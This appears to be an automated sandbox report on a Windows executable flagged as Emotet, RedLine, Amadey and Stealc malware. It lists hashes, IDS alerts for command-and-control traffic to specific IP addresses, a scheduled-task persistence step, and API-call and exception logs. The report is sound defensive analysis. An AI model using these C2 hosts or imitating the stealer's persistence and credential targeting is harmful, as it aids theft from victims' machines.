Summary | ZeroBOX

foto2552.exe

Emotet Gen1 RedLine stealer Amadey Malicious Library UPX Admin Tool (Sysinternals etc ...) ScreenShot PWS AntiDebug MSOffice File PNG Format PE File OS Processor Check PE32 CAB AntiVM DLL
Category: FILE
Machine: s1_win7_x6401
Started: Oct. 23, 2023, 4:48 p.m.
Completed: Oct. 23, 2023, 4:54 p.m.
Size 1.5MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 4cdb3ee7e130e01a02d7b8a7d8dae6ec
SHA256 97e759720fddf5321918c169fc23ced0272078081e40ab5c1c2f36cf523fb92a
CRC32 79933F06
ssdeep 24576:OyMMRU40y508+eqEF1Y/vN6M95+1WYru28jIKJFq8fdDS4Sbqc:dz8y509wFSnN6MLOruxjvA81ab
PDB Path wextract.pdb
Yara
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • CAB_file_format - CAB archive file
  • Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet
  • Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043233 ET INFO Microsoft net.tcp Connection Initialization Activity Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2046045 ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) A Network Trojan was detected
TCP 109.107.182.133:19084 -> 192.168.56.101:49172 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 192.168.56.101:49201 -> 157.240.31.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49204 -> 142.250.66.106:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49199 -> 172.217.24.110:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49174 -> 193.233.255.73:80 2018358 ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 Potentially Bad Traffic
TCP 192.168.56.101:49193 -> 77.91.124.1:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.101:49193 -> 77.91.124.1:80 2045751 ET MALWARE Win32/Amadey Bot Activity (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49171 -> 193.233.255.73:80 2047625 ET MALWARE [ANY.RUN] Win32/Stealc Checkin (POST) A Network Trojan was detected
TCP 192.168.56.101:49171 -> 193.233.255.73:80 2018358 ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043233 ET INFO Microsoft net.tcp Connection Initialization Activity Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49211 -> 172.217.31.3:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2046045 ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) A Network Trojan was detected
TCP 109.107.182.133:19084 -> 192.168.56.101:49179 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 192.168.56.101:49209 -> 172.217.31.3:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49221 -> 142.250.66.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49216 -> 172.217.24.110:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49220 -> 142.250.66.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49205 -> 142.250.66.106:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49219 -> 142.250.207.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49200 -> 172.217.24.110:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49214 -> 142.250.204.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49213 -> 142.250.204.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49210 -> 172.217.31.3:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49223 -> 77.91.124.1:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.101:49217 -> 172.217.24.110:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49218 -> 142.250.207.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 77.91.124.1:80 -> 192.168.56.101:49223 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 77.91.124.1:80 -> 192.168.56.101:49223 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 77.91.124.1:80 -> 192.168.56.101:49223 2015744 ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) Misc activity

Suricata TLS

Version | Flow | Issuer | Subject | Fingerprint
TLSv1 | 192.168.56.101:49201 -> 157.240.31.35:443 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | d2:70:1c:88:44:c4:5b:ce:c0:94:21:16:33:53:2b:ad:ff:95:57:38
TLSv1 | 192.168.56.101:49204 -> 142.250.66.106:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=upload.video.google.com | 28:23:2b:8b:2d:09:6c:bb:06:7a:35:80:95:bb:f8:03:41:c8:99:2c
TLSv1 | 192.168.56.101:49199 -> 172.217.24.110:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.google.com | c9:4d:78:ad:ec:04:27:ee:f0:06:4c:c8:78:d8:9f:06:b5:cc:39:37
TLSv1 | 192.168.56.101:49211 -> 172.217.31.3:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.gstatic.com | 55:7f:79:64:ed:7a:04:50:63:54:9c:32:2a:af:b7:95:17:d7:e0:33
TLSv1 | 192.168.56.101:49209 -> 172.217.31.3:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.gstatic.com | 55:7f:79:64:ed:7a:04:50:63:54:9c:32:2a:af:b7:95:17:d7:e0:33
TLSv1 | 192.168.56.101:49221 -> 142.250.66.132:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=www.google.com | 3d:4a:6b:fd:30:97:01:e9:c1:38:5f:67:2b:a6:a3:43:7b:2e:72:45
TLSv1 | 192.168.56.101:49216 -> 172.217.24.110:443 | None | None | None
TLSv1 | 192.168.56.101:49220 -> 142.250.66.132:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=www.google.com | 3d:4a:6b:fd:30:97:01:e9:c1:38:5f:67:2b:a6:a3:43:7b:2e:72:45
TLSv1 | 192.168.56.101:49205 -> 142.250.66.106:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=upload.video.google.com | 28:23:2b:8b:2d:09:6c:bb:06:7a:35:80:95:bb:f8:03:41:c8:99:2c
TLSv1 | 192.168.56.101:49219 -> 142.250.207.67:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.gstatic.com | 55:7f:79:64:ed:7a:04:50:63:54:9c:32:2a:af:b7:95:17:d7:e0:33
TLSv1 | 192.168.56.101:49200 -> 172.217.24.110:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.google.com | c9:4d:78:ad:ec:04:27:ee:f0:06:4c:c8:78:d8:9f:06:b5:cc:39:37
TLSv1 | 192.168.56.101:49214 -> 142.250.204.109:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=accounts.google.com | c3:ef:cc:c7:6c:fd:21:e8:b0:08:50:37:0f:ac:b1:dd:ab:1d:1e:ff
TLSv1 | 192.168.56.101:49213 -> 142.250.204.109:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=accounts.google.com | c3:ef:cc:c7:6c:fd:21:e8:b0:08:50:37:0f:ac:b1:dd:ab:1d:1e:ff
TLSv1 | 192.168.56.101:49210 -> 172.217.31.3:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.gstatic.com | 55:7f:79:64:ed:7a:04:50:63:54:9c:32:2a:af:b7:95:17:d7:e0:33
TLSv1 | 192.168.56.101:49217 -> 172.217.24.110:443 | None | None | None
TLSv1 | 192.168.56.101:49218 -> 142.250.207.67:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.gstatic.com | 55:7f:79:64:ed:7a:04:50:63:54:9c:32:2a:af:b7:95:17:d7:e0:33

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: start
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: "" https://www.facebook.com/login
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: start
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: "" https://www.youtube.com
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: start
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: "" https://accounts.google.com
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: SUCCESS: The scheduled task "explothe.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe
console_handle: 0x00000007
1 1 0

Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b9c68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b9ce8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b9be8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b9e68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003ba728
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003ba5e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00503ad8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00503b58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00503a58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00503cd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00504598
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00504458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
pdb_path wextract.pdb
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
resource name AVI
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
0x8fc13d
0x8fbf0e
0x8f6cad
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8fc278
registers.esp: 3337156
registers.edi: 3337208
registers.eax: 0
registers.ebp: 3337220
registers.edx: 3774440
registers.ebx: 3338428
registers.esi: 44250100
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x8438d96
0x8438c59
0x8438b75
0x843727b
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335508
registers.edi: 3335756
registers.eax: 0
registers.ebp: 3335768
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 45157532
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x843cfb0
0x84391a8
0x8438c59
0x8438b75
0x843727b
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335744
registers.edi: 3336028
registers.eax: 0
registers.ebp: 3335752
registers.edx: 0
registers.ebx: 3338428
registers.esi: 45157532
registers.ecx: 46406964
1 0 0

__exception__

stacktrace:
0x8438d96
0x8438c59
0x8438b8d
0x843727b
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335508
registers.edi: 3335756
registers.eax: 0
registers.ebp: 3335768
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 45157532
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x843cfb0
0x84391a8
0x8438c59
0x8438b8d
0x843727b
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335744
registers.edi: 3336028
registers.eax: 0
registers.ebp: 3335752
registers.edx: 0
registers.ebx: 3338428
registers.esi: 45157532
registers.ecx: 44144812
1 0 0

__exception__

stacktrace:
0x8438d96
0x8438c59
0x8438b8d
0x843727b
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335508
registers.edi: 3335756
registers.eax: 0
registers.ebp: 3335768
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 43907004
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x843cfb0
0x84391a8
0x8438c59
0x8438b8d
0x843727b
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335744
registers.edi: 3336028
registers.eax: 0
registers.ebp: 3335752
registers.edx: 0
registers.ebx: 3338428
registers.esi: 43907004
registers.ecx: 45575632
1 0 0

__exception__

stacktrace:
0x843d3e5
0x843d2b8
0x8438b75
0x84379f2
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
